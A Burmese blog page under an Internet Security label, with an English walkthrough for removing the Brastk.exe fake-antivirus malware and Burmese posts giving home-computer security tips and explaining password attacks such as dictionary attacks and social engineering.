ကၽြန္ေတာ္ခ်စ္ေသာသူငယ္ခ်င္းမ်ားအတြက္
...: ပညာေရး၊စီးပြားေရး၊ ဘာသာေရး၊ ဂီတ၊ ရုပ္ရွင္၊ စာေပ၊ နည္းပညာ၊ အိုင္တီ၊ ကူးယူရန္ေဆာ႔ဖ္၀ဲလ္မ်ားနဲ႕ အျခားေနရာမ်ားကို ဒီေနရာေလးကေန ေ၀မွ်ေပးလိုက္ပါတယ္ :...

... BE PEACEFUL AND HAPPY ALL THE MOMENTS, ALL MY FRIENDS ...

Showing posts with label အင္တာနက္လံုျခံဳေရး Internet Security. Show all posts
Showing posts with label အင္တာနက္လံုျခံဳေရး Internet Security. Show all posts

Nov 28, 2008

Killing and Removing Brastk.exe Malware

"Brastk.exe" (this link will open Google search with brastk.exe keyword) is a malware program and it stay in the following directories, and many paths of the registry.
C:Windows\
C:Windows\System32\
When a PC is infected with this malware,
- it appear in system tray with red icon with X,
- frequently display of a message, that The system is infected with a virus ... .
- if we click that message, then it tries to install "XP Antispyware 2009" (also a fake antispyware).
So it is very annoyed to infected PC and user.
To remove this malware from the infected pc, I used the following tools and techniques.

Tools

  1. TCPView (this link to SysInternal and will open in new window) to check all the open ports.
  2. Revo Uninstaller (this link to Revo Uninstaller Download page and will open in new window) to check and remove all "Auto Run" files and other unnecessary files.
  3. Hijackthis (this is direct download link to HijackThis and will open in new window) to check the contents of key areas of the Registry and hard drive--areas that are used by both legitimate programmers and hijackers.
  4. Malwarebytes' Anti-Malware program (this link to MBAM Download page and will open in new window) to check all malware finally.

Techniques

  1. Disable network connection.
  2. Run the Registry and look for the “brastk.exe”, all its paths and keys, and delete all.
  3. Find and delete the “brastk.exe” under C:\Windows\directory
  4. Used the tool “TCPView” to check all the open ports of infected PC. This “Brastk.exe” used, UDP port 1025. Then selected the process of “brastk.exe”, and use “End Process…” command from Process menu of the TCPView. This “brastk.exe” program run away at once from system tray.
After Killing the “brastk.exe” with TCPView,
  1. Delete the “brastk.exe” under C:\Windows\system32\ directory.
  2. Clean all temp files from %tmp%, %temp% and %prefetch%.
  3. Run Revo Uninstaller to check all start up files and unwanted files.
  4. Run Hijackthis and check all key areas of the Registry and hard drive again.
  5. Use Malwarebytes' Anti-Malware program to recheck all the rest of malware threats.
  6. Finally, Restart the infected PC and check again.
Now everything will be OK on the infected PC.
Any new ways and comments for this solutions are welcome.

Mar 27, 2008

72 Security Tips for Daily Computing Life (1)

ကြန္ပ်ဳတာ လံုျခံဳေရး ရတက္ေအးစရာ နည္းလမ္း ၇၂ သြယ္ - အပိုင္း (၁)

ကြၽန္ေတာ္တို႔ သည္ ကြန္ပ်ဳတာကို ယခုမွ စတင္ အသံုးျပဳတတ္ကာစ သူတစ္ဦး ျဖစ္ေစ၊ ကာလရွည္ၾကာစြာ ကြၽမ္းကြၽမ္းက်င္က်င္ အသံုးျပဳတတ္ေနသူ တစ္ဦး ျဖစ္ေစ ကြၽန္ေတာ္တို႔ႏွင့္ ကြၽန္ေတာ္တို႔၏ မိသားစုမ်ား၊ မိတ္ေဆြသူငယ္ခ်င္းမ်ား အေနျဖင့္ ကြန္ပ်ဳတာႏွင့္ အင္တာနက္ကို အသံုးျပဳၾကသည့္ အခါတြင္ စိတ္ခ်လက္ခ် ေဘးရန္ကင္းရွင္းစြာျဖင့္ အသံုးျပဳႏိုင္ရန္မွာ အထူးအေရးၾကီးေပသည္။

ယခုေခတ္၊ ယခုအခါကဲ့သို႔ ေနရာတကာတြင္ ဗိုင္းရပ္စ္(Virus)၊ ထရိုဂ်န္(Trojan) စသည့္ ကြန္ပ်ဳတာမ်ားႏွင့္ ကြန္ပ်ဳတာ အသံုးျပဳသူမ်ားကို အခ်ိန္မေရြး၊ ေနရာမေရြး စိတ္အေႏွာင့္အယွက္ ေပးႏိုင္ေသာ၊ ဒုကၡေပးႏိုင္ေသာ ေဘးရန္ မ်ားလြန္းသည့္ အေျခအေနတြင္ ကြန္ပ်ဳတာကို စိတ္ေအးလက္ေအး အသံုးျပဳႏိုင္ရန္မွာ - အင္တာနက္ ခ်ိတ္ဆက္မႈကို ရပ္တန္႔ထားကာ၊ မည္သည့္ ေဆာ့ဖ္၀ဲ ပရိုဂရမ္၊ မည္သည့္ မွတ္ဥာဏ္ပစၥည္း (Memory Device)ကိုမွ် ကြန္ပ်ဳတာအတြင္း တပ္ဆင္အသံုးျပဳမႈ မျပဳဘဲေနျခင္းမ်ား - ကသာ အေကာင္းဆံုး ျဖစ္ေတာ့မည္ဟု ထင္မွတ္ရသည့္ အေျခအေန ျဖစ္လာသည္။

ထိုကဲ့သို႔ေနလွ်င္လည္း ရေကာင္း ရႏိုင္ဖြယ္ရာ ရွိပါသည္။ သို႔ေသာ္ အင္တာနက္ကိုလည္း အသံုးမပ်က္ အသံုးျပဳရင္း၊ ႏွစ္သက္ သေဘာက်သည့္ ေဆာ့ဖ္၀ဲ ပရိုရမ္ အသစ္အဆန္းမ်ား ကိုလည္း ကြန္ပ်ဳတာအတြင္း တပ္ဆင္စမ္းသပ္ အသံုးျပဳရင္း၊ ေဘးကင္းရန္ကင္းလည္း ေနထိုင္ႏိုင္သည့္ နည္းလမ္းမ်ား ရွိမည္ဆိုပါက - ထိုနည္းလမ္းမ်ားကို အသံုးျပဳျခင္းက ပိုေကာင္းမည္ မဟုတ္ပါလား။

ကြၽန္ေတာ္တို႔ အေနျဖင့္ -

  1. အကာအကြယ္ေပးသည့္ ေဆာ့ဖ္၀ဲမ်ားကိုလည္း ကြန္ပ်ဳတာတြင္ ထည့္သြင္းတပ္ဆင္ ထားမည္။
  2. ကြန္ပ်ဳတာ အသံုးျပဳသည့္အခါ လိုက္နာရမည့္ ေဆာင္ရန္၊ေရွာင္ရန္ အေလ့အက်င့္ေကာင္းမ်ား ကိုလည္း ေလ့လာ မွတ္သားထားမည္။
  3. အေရးအၾကီးဆံုး အခ်က္တစ္ခု အေနျဖင့္ အေျခအေနတစ္ရပ္ကို ေကာင္းမြန္စြာ သံုးသပ္ ဆံုးျဖတ္တတ္ေသာ အေလ့အက်င့္ေကာင္းလည္း ရွိေနမည္ ဆိုလွ်င္
ကြၽန္ေတာ္တို႔၏ "ကြန္ပ်ဳတာ အသံုးျပဳမႈ ေန႔စဥ္ဘ၀" (Daily Computing Life) မွာ ပိုမို ႏွစ္သက္ေပ်ာ္ရႊင္ဖြယ္ရာ ျဖစ္လာေပမည္။

ကြၽန္ေတာ္တို႔၏ ေန႔တဓူ၀ ကြန္ပ်ဳတာႏွင့္အင္တာနက္ အသံုးျပဳမႈမ်ားတြင္ စိတ္ခ်လက္ခ် ေဘးရန္ကင္းရွင္းစြာ ေနထိုင္ အသံုးျပဳႏိုင္ေသာ အေျခအေနကို ရရွိေနေစရန္အတြက္ မျဖစ္မေန ေဆာင္ရြက္ထားရမည့္ အနည္းဆံုး လုပ္ေဆာင္ဖြယ္ရာမ်ားႏွင့္ ပိုမို ျပည့္စံုသည့္ လုပ္ေဆာင္ဖြယ္ရာမ်ားကို ေအာက္တြင္ စုစည္း ေဖာ္ျပထားပါသည္။

အနည္းဆံုးလိုအပ္ခ်က္မ်ား

(၁) ဗိုင္းရပ္စ္ကာကြယ္ေရး ေဆာ့ဖ္၀ဲမ်ားတပ္ဆင္ရန္လိုအပ္သည္။ ထိုမွ်မက ဗိုင္းရပ္စ္အမ်ဳိးအစားသစ္မ်ားမွာ ေန႔စဥ္ ထြက္ေပၚေနသည့္ အတြက္ တပ္ဆင္ထားသည့္ ဗိုင္းရပ္စ္ကာကြယ္ေရး ေဆာ့ဖ္၀ဲမွာလည္း ၎ဗိုင္းရပ္စ္မ်ားကို အခ်ိန္ႏွင့္အမွ် အစဥ္အၿမဲ သိေနေစရန္ (Update) လုပ္ထားရမည္။ ကြန္ပ်ဴတာကို ပံုမွန္စစ္ေဆးျခင္း၊ ခရီးေဆာင္မွတ္Óဏ္ပစၥည္း (Memory Stick, Pen Drive စသည္) မ်ား တပ္ဆင္သည့္အခါတိုင္းတြင္ ဗိုင္းရပ္စ္စစ္ေဆးၿပီးမွ အသံုးျပဳျခင္းမ်ား ေဆာင္ရြက္ဖို႔ လိုအပ္သည္။ အင္တာနက္မွ ျဖတ္သန္းေရာက္ရွိလာ ေသာ စာ (email) မ်ား၊ စာတို (message) မ်ား၊ အင္တာနက္လိပ္စာ (link) မ်ားကို စနစ္တက် စစ္ေဆးၿပီးမွ ဖတ္႐ႈဖို႔လိုသည္။ ထိုကဲ့သို႔ ေဆာင္ရြက္ျခင္းမ်ား မရွိလွ်င္ေတာ့ ကြၽန္ေတာ္တို႔၏ ကြန္ပ်ဴတာတြင္ ဗိုင္းရပ္စ္ ၀င္ေရာက္ အေႏွာင့္အယွက္ေပးမည္မွာ ေသခ်ာေပါက္ပင္ ျဖစ္သည္။

(၂) စပိုင္ကာကြယ္ေရးေဆာ့ဖ္၀ဲ (Antispyware) ကို အၿမဲ Update လုပ္ပါ။ စပိုင္ကာကြယ္ေရးေဆာ့ဖ္၀ဲမ်ားသည္ ဗိုင္းရပ္စ္ကာကြယ္ေရး ေဆာ့ဖ္၀ဲမ်ားတြင္ ပါ၀င္ၿပီးသား ျဖစ္ေလ့ရွိသည္။ ၄င္းကို အၿမဲတမ္း Update လုပ္ထားဖို႔လိုသည္။ ၄င္းေဆာ့ဖ္၀ဲျဖင့္ မၾကာခဏဆိုသလို ကြန္ပ်ဴတာကို စစ္ေဆးေပးရမည္။ စပိုင္ကာကြယ္ေရးေဆာ့ဖ္၀ဲမ်ားကို ႏွစ္မ်ဳိးသံုးမ်ဳိးခန္႔အထိ ထည့္သြင္းထားႏိုင္သည္။ ဥပမာ Windows Vista တြင္ စပိုင္ကာကြယ္ေရးအတြက္ (Windows Defender) ပါရွိလာၿပီးျဖစ္ေသာ္လည္း - Spy Sweeper, Spybot စသည့္ အျခားေဆာ့ဖ္၀ဲမ်ားကိုလည္း ထည့္သြင္းထားႏိုင္သည္။ အေရးႀကီးသည္မွာ ထည့္သြင္းထားသည့္ အကာအကြယ္ေဆာ့ဖ္၀ဲမ်ားကို အၿမဲတမ္း Update ျဖစ္ေနေအာင္ ျပဳလုပ္ထားရန္ပင္ ျဖစ္သည္။

(၃) Firewall မ်ားျဖင့္ ကြန္ပ်ဴတာကို အကာအကြယ္ေပးထားပါ။ ကြၽန္ေတာ္တို႔၏ ကြန္ပ်ဴတာအတြင္းသို႔ ၀င္ေရာက္လာေသာ အခ်က္အလက္မ်ား (Inbound Data) ၊ ကြန္ပ်ဴတာအတြင္းမွ ျပန္လည္ေပးပို႔လိုက္ေသာ အခ်က္အလက္မ်ား (Outbound Data) သြားလာစီးဆင္းရာ လမ္းေၾကာင္းအေနအထား (Traffic) မ်ားကို Bidirectional Firewall မ်ားက ေစာင့္ၾကည့္ စစ္ေဆးေပးေလ့ ရွိၾကသည္။ ပန္းသီးကြန္ပ်ဴတာမ်ားရွိ Mac OS ႏွင့္ Windows Vista တို႔တြင္ပါရွိေသာ Firewall မ်ားမွာ Bidirectional အမ်ဳိးအစားမ်ား ျဖစ္ၾကသည္။ အကယ္၍ Windows XP ႏွင့္ အျခားေသာ ၀င္းဒိုးစနစ္ေဟာင္းမ်ားကို သံုးေနဆဲျဖစ္ပါက ZoneAlarm ကဲ့သို႔ေသာ Firewall မ်ားကို ထည့္သြင္းတပ္ဆင္ထားရန္ လိုအပ္ေပသည္။

(၄) Firewall မ်ားႏွင့္ဗိုင္းရပ္စ္ကာကြယ္ေရး ေဆာ့ဖ္၀ဲမ်ားကို တစ္ခုထက္ပို၍ ထည့္သြင္းထားျခင္းမ်ဳိး မျပဳလုပ္ပါႏွင့္။ အျပင္ေလာကတြင္ မီးခံေသတၱာႏွစ္ထပ္ျဖင့္ အဖိုးတန္ပစၥည္းမ်ား ထည့္သြင္း ထားရွိျခင္းသည္ ပိုမိုစိတ္ခ်ရသည့္ အေျခအေနမ်ဳိးကို ျဖစ္ေပၚေစႏိုင္သည္။ သို႔ေသာ္လည္း ကြန္ပ်ဴတာစနစ္တစ္ခုအတြင္း Firewall ေဆာ့ဖ္၀ဲႏွစ္မ်ဳိးကို တပ္ဆင္အသံုးျပဳပါက အကာအကြယ္ႏွစ္ဆ တိုးမလာေတာ့ဘဲ၊ တစ္ခုႏွင့္တစ္ခု အျပန္အလွန္ အေႏွာင့္အယွက္ ေပးကာ စိတ္ညစ္စရာ ႏွစ္ဆတိုးလာႏိုင္မည္ ျဖစ္သည္။ ဗိုင္းရပ္စ္ကာကြယ္ေရး ေဆာ့ဖ္၀ဲမ်ား ကိုလည္း ႏွစ္မ်ဳိးမသံုးပါႏွင့္။ တစ္မ်ဳိးတည္း ကိုသာ တပ္ဆင္ပါ။ (စပိုင္ကာကြယ္ေရး ေဆာ့ဖ္၀ဲမ်ားကိုေတာ့ တစ္ခုမက တပ္ဆင္ အသံုးျပဳႏိုင္ပါသည္)။

(၅) ကြန္ပ်ဴတာ စနစ္မ်ား၏ "ေနာက္ဆံုး အေျခအေနႏွင့္ ကိုက္ညီေစရန္ အခ်ိန္ႏွင့္တေျပးညီ အလိုအေလ်ာက္ ျဖည့္ဆည္းမႈ" (Automatic Updates) စနစ္မ်ားကို ခြင့္ျပဳထားပါ။ ကြန္ပ်ဴတာစနစ္မ်ားကို အဓိကထုတ္လုပ္သည့္ အဖြဲ႕အစည္းႏွစ္ခုျဖစ္သည့္ Microsoft ႏွင့္ Apple တို႔သည္ ၄င္းတို႔ ရွာေဖြေတြ႔ရွိသမွ် "စနစ္၏ လံုျခံဳေရးဆိုင္ရာ လစ္ဟာခ်က္မ်ား" (Security Holes) ကို ပံုမွန္ျဖည့္ဆည္းေပးေနေလ့ ရွိၾကသည့္ အတြက္ Windows ႏွင့္ Mac OS တို႔၏ အခါအားေလ်ာ္စြာ (လိုအပ္သလို) Update ျပဳလုပ္ျခင္းမ်ားကို တားဆီးမထားပါႏွင့္။ Auto Update ျပဳလုပ္ပါေစ။

(၆) EXE ဖိုင္မ်ားကို အလြယ္တကူ လက္မခံပါႏွင့္။ . exe,.com, .bat ႏွင့္ .scr တို႔ျဖင့္ အဆံုးသတ္ေလ့ ရွိေသာ၊ လုပ္ငန္း တစ္စံုတစ္ရာကို ေဆာင္ရြက္ေပးႏိုင္သည့္ (Executable) ဖိုင္မ်ားကို အင္တာနက္မွ ေဒါင္းလုဒ္ရယူကာ အသံုးျပဳရသည့္ ကိစၥမွာ ေရွာင္လႊဲရန္ ခက္ခဲေပသည္။ သို႔ေသာ္လည္း မသိဘူး၊ မျမင္ဘူးသူမ်ားထံမွျဖစ္ေစ၊ Forward ျပဳလုပ္လိုက္ေသာ အီးေမးလ္မ်ားမွ ျဖစ္ေစ ေရာက္ရွိလာသည့္ Executable ဖိုင္မ်ားကိုေတာ့ သတိထားရန္ လိုသည္။ အလားတူပင္ .doc ႏွင့္ .xls စသည့္ Microsoft Word ႏွင့္ Excel ဖိုင္မ်ားသည္လည္း Macro ဗိုင္းရပ္စ္မ်ားကို သယ္ေဆာင္လာႏိုင္သည့္ အတြက္ သတိျပဳစစ္ေဆးရန္ လိုအပ္သည္။

(၇) မိမိဆက္သြယ္ေနသည့္ လမ္းေၾကာင္းကို တိက်စြာ သတ္မွတ္ထားရွိပါ။ အကယ္၍ သင္သည္ Broadband အမ်ဳိးအစား အင္တာနက္ ဆက္သြယ္မႈကို ရရွိ အသံုးျပဳေနသူ ျဖစ္ေသာ္လည္း Router တပ္ဆင္ထားျခင္း မရွိပါက Router တစ္ခု ၀ယ္ယူတပ္ဆင္အသံုးျပဳပါ။ ႀကိဳးရွိ Router ျဖစ္ေစ၊ ႀကိဳးမဲ့ Router ျဖစ္ေစ အသံုးျပဳႏိုင္သည္။

(၈) Hardware Firewall ကို အကာအကြယ္ ယူထားပါ။ သင္၏ Router သည္ "ကြန္ရက္လိပ္စာ ဘာသာျပန္ဆို ေျပာင္းလဲမႈ" NAT (Network Address Translation) ကို အေထာက္အပံ့ ေပးႏိုင္ရမည္။ ထုိ႔ေၾကာင့္ သင္၏ ကြန္ပ်ဴတာမွ ပြင့္ေနေသာ Port မ်ားကို ရွာေဖြကာ အႏၱရာယ္ေပးလာမည့္၊ အင္တာနက္မွ မသမာသူမ်ား၏ ေဘးရန္ကို ကာကြယ္မႈ ရရွိေစမည္။ ၄င္း Firewall သည္ ဆက္သြယ္ေရး လမ္းေၾကာင္းမ်ားကို ေကာင္းမြန္စြာရရွိေစရန္ အေထာက္အကူ ျပဳႏိုင္ေသာ SPT (Stateful Packet Inspection) ကိုလည္း အေထာက္အပံ့ ေပးႏိုင္ရမည္။ ထို႔ေၾကာင့္ သင္၏ Hardware Firewall မွ အဆိုပါ အဂၤါရပ္မ်ားကို ဖြင့္ထားပါ။

ဆက္လက္ေဖာ္ျပပါမည္... >>> Malware / Antivirus
Ref: PC Magazine ,Feb 08

Related Blog Posts:
ကြၽန္ေတာ္တို႔ရဲ႕ စကား၀ွက္ (၁) - Our Password (1)
ကြၽန္ေတာ္တို႔ရဲ႕ စကား၀ွက္ (၂) - Our Password (2)

Aug 8, 2007

ကၽြန္ေတာ္တို႕ ရဲ႕ စကား၀ွက္ (၂)- Our Passwords (2)


ကၽြန္ေတာ္တို႔ရဲ႕ စကား၀ွက္ေတြဟာ နည္းအမ်ဳိးမ်ဳိးနဲ႔ ခိုးယူခံရႏိုင္ပါတယ္ ...
အဲဒီနည္းေတြ အနက္က အမ်ားဆံုး သံုးေလ့ရွိတဲ့ နည္းႏွစ္ခုကေတာ႔ “အဘိဓါန္” နည္းစနစ္နဲ႔ “လူမႈ အင္ဂ်င္နီယာ” နည္းစနစ္ေတြပဲ ျဖစ္ပါတယ္..

အဘိဓါန္ နည္းစနစ္ (Dictionary attack)
“ဟက္ကာ” အမ်ားစုက အားနည္းတဲ့ စကား၀ွက္မ်ားကို ေဖာ္ထုတ္ႏိုင္ရန္အတြက္ မ်ားျပားက်ယ္ျပန္႔စြာရရွိႏိုင္ေသာ စကား၀ွက္ ခ်ဳိးဖ်က္ႏိုင္သည့္ အဘိဓါန္မ်ားကို အသံုးျပဳၾကပါတယ္။ အဲဒီလို အဘိဓါန္ေတြကို အသံုးျပဳတိုက္ခိုက္တဲ့ နည္းစနစ္ျဖစ္တာမို႕ “ အဘိဓါန္ ” Dictionary Attack လို႔ ေခၚၾကတာ ျဖစ္ပါတယ္။ အဲဒီအတြက္ေၾကာင့့္ မိမိတို႔မွာ အႏၱရာယ္ ၾကံဳေတြ႔လာႏိုင္သည့္ အေျခအေနမ်ား၊ နည္းလမ္းမ်ားကို ေလ်ာ့ခ်ႏိုင္ရန္အတြက္ “အားေကာင္း ခိုင္မာေသာ စကား၀ွက္” မ်ားကို ဖန္တီး၊ အသံုးျပဳၾကရမွာ ျဖစ္ပါတယ္ ...

မွတ္ခ်က္ -
စကား၀ွက္မ်ားကို အသံုးျပဳထားျခင္းသည္ ကြန္ပ်ဳတာ လံုျခံဳေရးစနစ္ နယ္ပယ္တြင္ အဓိကက်ေသာ ေပ်ာ့ကြက္ တစ္ခုျဖစ္သည္။ အေၾကာင္းမွာ အဘိဓါန္နည္းစနစ္ကို အသံုးျပဳကာ အလိုအေလ်ာက္စနစ္ျဖင့္ အလုပ္လုပ္ေနေသာ ပရိုဂရမ္မ်ားျဖင့္ စကား၀ွက္မ်ားကို ခန္႔မွန္းရသည္မွာ လြယ္ကူေၾကာင္း မၾကာခဏ ေလ့လာေတြ႕ရွိရျခင္းေၾကာင့္ ျဖစ္သည္။

လူမႈ အင္ဂ်င္နီယာ နည္းစနစ္ (Social engineering attack)
“ လူမႈ အင္ဂ်င္နီယာ ” ေလာကမွာ မေကာင္းသတင္းျဖင့္ အေက်ာ္ၾကားဆံုး ပုဂၢိဳလ္ “ကီဗင္မင္နစ္ခ္” (Kevin Mitnick) ေျပာခဲ့တဲ့ စကားတစ္ခြန္းကေတာ့ “ လူသားေတြဟာ အားအေပ်ာ့ဆံုးေသာ ေနရာမွာ ရွိေနတယ္။ သင့္ထံတြင္ အေကာင္းဆံုးေသာ နည္းပညာမ်ား ရွိေကာင္း ရွိေနႏိုင္တယ္ ... ဒါေပမယ့္ တစ္စံုတစ္ေယာက္ဟာ ၀န္ထမ္းတစ္ေယာက္ေယာက္ကို သံသယမရွိ ယံုၾကည္လာေအာင္ လွည့္စားႏိုင္လိုက္တာနဲ႕ သူလိုခ်င္တဲ့ အခ်က္အလက္ စတဲ့ လိုအပ္သည့္ အရာမ်ား အားလံုးကို ရရွိသြား ႏိုင္ပါတယ္ ..”

အဲဒါေၾကာင့္ ရင္ဆိုင္လာရမည့္ ေဘးရန္မ်ားကို ေလ်ာ့ခ်ႏိုင္ရန္အတြက္

  • အျမဲတမ္း သတိ၀ိရိယရွိျခင္း ၊ အရာရာကို အမွတ္တမဲ့ မေနပဲ စူးစမ္းေလ့လာ စပ္စုျခင္း ...
  • မိမိ ရိုက္ႏွိပ္လိုက္သည့္ စကား၀ွက္ ခလုတ္မ်ားကို အျခားသူမ်ားမွ ေစာင့္ၾကည့္ေနျခင္း ရွိမရွိ ဂရုစိုက္ျခင္း ...
  • မိမိထံမွ အေရးၾကီးေသာ မည္သည့္ သတင္းအခ်က္အလက္မ်ားကိုမဆို ေပးလိုက္ရေတာ့မည္ဆိုပါက လက္ခံသူမွာ အမွန္တကယ္ေပးရမည့္သူျဖစ္ေၾကာင္း မွန္ကန္မႈရွိမရွိ စစ္ေဆးျခင္း၊ ယံုၾကည္ႏိုင္ရသူျဖစ္ပါမွ ေပးျခင္း ... စတဲ့ အခ်က္ေလးေတြကို အျမဲဂရုျပဳ ေနဖို႕လိုအပ္ပါတယ္။
ကၽြန္ေတာ္တို႔၏ အမွတ္အသားႏွင့္ လြတ္လပ္မႈ
စကား၀ွက္ေတြဟာ ကၽြန္ေတာ္တို႔ရဲ႕ ကိုယ္ပိုင္ အမွတ္အသားျဖစ္ပါတယ္။ လူခ်င္း ေတြ႕စရာမလိုဘဲ အလုပ္လုပ္ေနၾကတဲ့ အင္တာနက္ထဲမွာ ကၽြန္ေတာ္တို႔ကို အျခားသူမ်ားႏွင့္ မတူညီေအာင္၊ သီးျခားလြတ္လပ္မႈ ရွိေနေစေအာင္ ဖန္တီး ေပးထားႏိုင္စြမ္း ရွိေနတဲ့ တစ္ခုတည္းေသာ အရာဟာ စကား၀ွက္ေတြပဲ ျဖစ္ပါတယ္။ အဲဒါေၾကာင့္ စကား၀ွက္ကို
“ တစ္စံုတစ္ရာ၏ ကိုယ္ပိုင္အမွတ္အသား ျဖစ္ေၾကာင္း အတည္ျပဳေပးႏိုင္ေသာ၊ ၄င္းတစ္စံုတစ္ရာႏွင့္သက္ဆိုင္ေနသည့္ သတင္းအခ်က္အလက္ အစုအေ၀းတစ္ရပ္”
လို႔ ေျပာႏိုင္ပါတယ္။
စကား၀ွက္ေတြကို ဘာေၾကာင့္သံုးရသလဲ ေျပာရမယ္ဆိုရင္
“ တစ္စံုတစ္ရာသည္ ထိုတစ္စံုတစ္ရာ အစစ္အမွန္ျဖစ္ေၾကာင္း
အတည္ျ႔ပဳ (authentication) ရန္အတြက္ အသံုးျပဳေလ့ ရွိသည္..”
လို႔ ေျပာရမွာ ျဖစ္ပါတယ္..
လူခ်င္းေတြ႕စရာမလိုဘဲ အလုပ္လုပ္ႏိုင္ေစဖို႔ အတြက္ တစ္ဦးခ်င္းစီမွာ
“ မည္သူႏွင့္မွ မတူညီေသာ သီးျခားအမည္ တစ္ခုစီ ” နဲ႕ သက္ဆိုင္ရာ “ စကား၀ွက္ တစ္ခုစီ ”
သတ္မွတ္ထားရွိျပီး သက္ဆိုင္ရာေနရာကို ၀င္ေရာက္ရတဲ့ အခါတိုင္း၊ မွန္ေအာင္ထည့္သြင္းျပီး ၀င္ေရာက္ ေနၾကရတာဟာ အင္တာနက္ သံုးေနသူေတြအတြက္ အထူးေျပာေနစရာ မလိုေအာင္ကို လုပ္ေနၾက အလုပ္တစ္ခုလို ျဖစ္လို႔ေနပါျပီ .. အဲဒီေနရာမွာ အခ်င္းခ်င္း ဆက္သြယ္ႏိုင္ဖို႔ အတြက္ အခ်ဳိ႕ေသာ စနစ္မ်ားမွာ “ ကိုယ္ပိုင္အမည္ (Registration name, User name) ” နဲ႔ အမ်ားကို ေဖာ္ျပေပးတဲ့ “ အမ်ားသိတဲ့ အမည္ (Screen name)” ဆိုျပီး သီးျခားစီ ထားရွိၾကတာ ၾကံဳဖူးၾကမွာပါ ... ဒါမ်ဳိးေတြဟာ လံုျခံဳမႈစနစ္ကို ပိုေကာင္းေစတဲ့ သေဘာပဲ ျဖစ္ပါတယ္...

ဒီလို ၀င္ေရာက္ၾကတဲ့ အခါမွာ ထည့္သြင္းလိုက္တဲ့ အမည္နဲ႔ စကား၀ွက္ အေပၚမူတည္ျပီး “ ဒါ ဘယ္သူ ဘယ္၀ါ ျဖစ္တယ္ ” ဆိုတာကို သက္ဆိုင္ရာ စနစ္က သတ္မွတ္ ဆံုးျဖတ္သြားတာ ျဖစ္ပါတယ္ ... သက္ဆိုင္တဲ့သူ အစစ္အမွန္ ျဖစ္မျဖစ္ ဆိုတာကို စကား၀ွက္ေလး တစ္ခုတည္းနဲ႔ ဆံုးျဖတ္သြားတာမို႔ စကား၀ွက္ေတြဟာ အေတာ္ေလး အေရးၾကီးတာ သိသာပါတယ္ .... အမည္ေတြကေတာ့ အျခားသူေတြလည္း ကိုယ့္ရဲ႕ အမည္ကို သိေနၾကတာမို႔ စကား၀ွက္ေလး တစ္ခုတည္းပဲ ထိန္းေနတာ ျဖစ္ပါတယ္ ... မွန္ေအာင္ထည့္သြင္းလိုက္ႏိုင္တာနဲ႔ သက္ဆိုင္ရာ စနစ္ထဲကို ၀င္ေရာက္သြားႏိုင္တာကို " Log In " လို႔ေျပာၾကတာပါပဲ ...

မွတ္ခ်က္ -
စကား၀ွက္ေတြမွာ လံုျခံဳေရးနဲ႔ သက္ဆိုင္တဲ့ အားနည္းခ်က္ေတြ အမ်ားၾကီးရွိေနတာ သိထားၾကေပမယ့္လည္း လူတစ္ေလာက္ကို မျမင္ေတြ႕ရဘဲ အဲဒီသူ အမွန္ျဖစ္ေၾကာင္း စစ္ေဆးဖို႔အတြက္ နည္းလမ္းတစ္ခု အျဖစ္ အခုထိ အသံုးျပဳေနရဆဲပဲ ျဖစ္ပါတယ္ ...

တိုက္ခိုက္ခံရလွ်င္
အကယ္၍ ကၽြန္ေတာ္တို႔ မဟုတ္တဲ့ အျခားသူတစ္ဦးက ကၽြန္ေတာ္တို႔ရဲ႕ စကား၀ွက္ကို သိသြားျပီး စနစ္တစ္ခုထဲကို ကၽြန္ေတာ္တို႔ ဟန္ေဆာင္ျပီး ၀င္ေရာက္သြားခဲ့မယ္ဆိုရင္ အဲဒီသူ အေနနဲ႔ အဲဒီစနစ္ထဲ (ဥပမာ - web site, ဘဏ္စာရင္း စသည္) မွာ ရွိေနတဲ့
  • ကၽြန္ေတာ္တို႔ရဲ႕ ကိုယ္ေရးအခ်က္အလက္ေတြကို သိခြင့္ရသြားပါျပီ ...
  • ဒါဟာ ကၽြန္ေတာ္တို႔ရဲ႕ တစ္ကိုယ္ေရ လြတ္လပ္မႈ (Privacy) ပ်က္စီးသြားတာပဲ ျဖစ္ပါတယ္ ...
  • ဆက္လက္ျပီး မဟုတ္တာေတြ၊ ရာဇ၀တ္မႈေတြကို ဆက္လုပ္သြားမယ္ဆိုရင္
  • ကၽြန္ေတာ္တို႔ရဲ႕ ကိုယ္ပိုင္ အမွတ္အသား (Identity) ဟာလည္း ပ်က္စီးသြားရျပီ ျဖစ္ပါတယ္ ...
မွတ္ခ်က္ -
အင္တာနက္ထဲမွာ အလုပ္လုပ္ေနတဲ့ ၀က္ဘ္ဆိုဒ္တစ္ခုမွာ အသံုးျပဳေနတဲ့ စကား၀ွက္စနစ္တစ္ခု လံုျခံဳဖို႔ဆိုတာဟာ အဲဒီစနစ္ကို အသံုးျပဳေနၾကတဲ့ သူေတြရဲ႕ “ လံုျခံဳေရးဆိုင္ရာအသိမ်ားနဲ႕ သတိထား လုပ္ေဆာင္မႈမ်ား ” အေပၚမွာ အေတာ္ေလး ခိုင္ခိုင္မာမာ ရပ္တည္ေနပါတယ္ ...

စကား၀ွက္မ်ားႏွင့္ ပတ္သက္၍ မွတ္သားထားသင့္သည့္ အခ်က္မ်ား
  1. အခုလို သတင္းနည္းပညာ ေခတ္ထဲမွာ ကၽြန္ေတာ္တို႔ရဲ႕ ကိုယ္ပိုင္အမွတ္အသား (Identity) နဲ႔ တကိုယ္ေရ လြတ္လပ္မႈ (Privacy) ေတြကို အကာအကြယ္ ေပးႏိုင္ဖို႔ ဆိုတာဟာ စကား၀ွက္ေတြရဲ႕ အေၾကာင္းကို ေကာင္းစြာ သိရွိနားလည္ အသံုးခ်ႏိုင္မႈအေပၚ မ်ားစြာ မူတည္ပါတယ္ ...
  2. အင္အားေကာင္းတဲ့၊ ခိုင္မာတဲ့၊ အလြယ္တကူ သူတပါး မခန္႔မွန္းႏိုင္တဲ့ စကား၀ွက္ေတြကုိ မသံုးတဲ့သူ၊ သံုးတဲ့ အေလ့အက်င့္ မရွိတဲ့သူေတြဟာ ကိုယ့္ကိုယ္ကို ျပန္ျပီး တိုက္ခိုက္ေနသလို ျဖစ္ေနမွာပါပဲ ...
  3. တကယ္လို႔ ကိုယ့္မွာ မွတ္သားရမယ့္ စကား၀ွက္ေတြ သိပ္မ်ားေနတယ္ဆိုရင္ေတာ့ စကား၀ွက္သိမ္းေပးတဲ့ ေဆာ့ဖ္၀ဲေတြကို သံုးႏိုင္ပါတယ္ ...
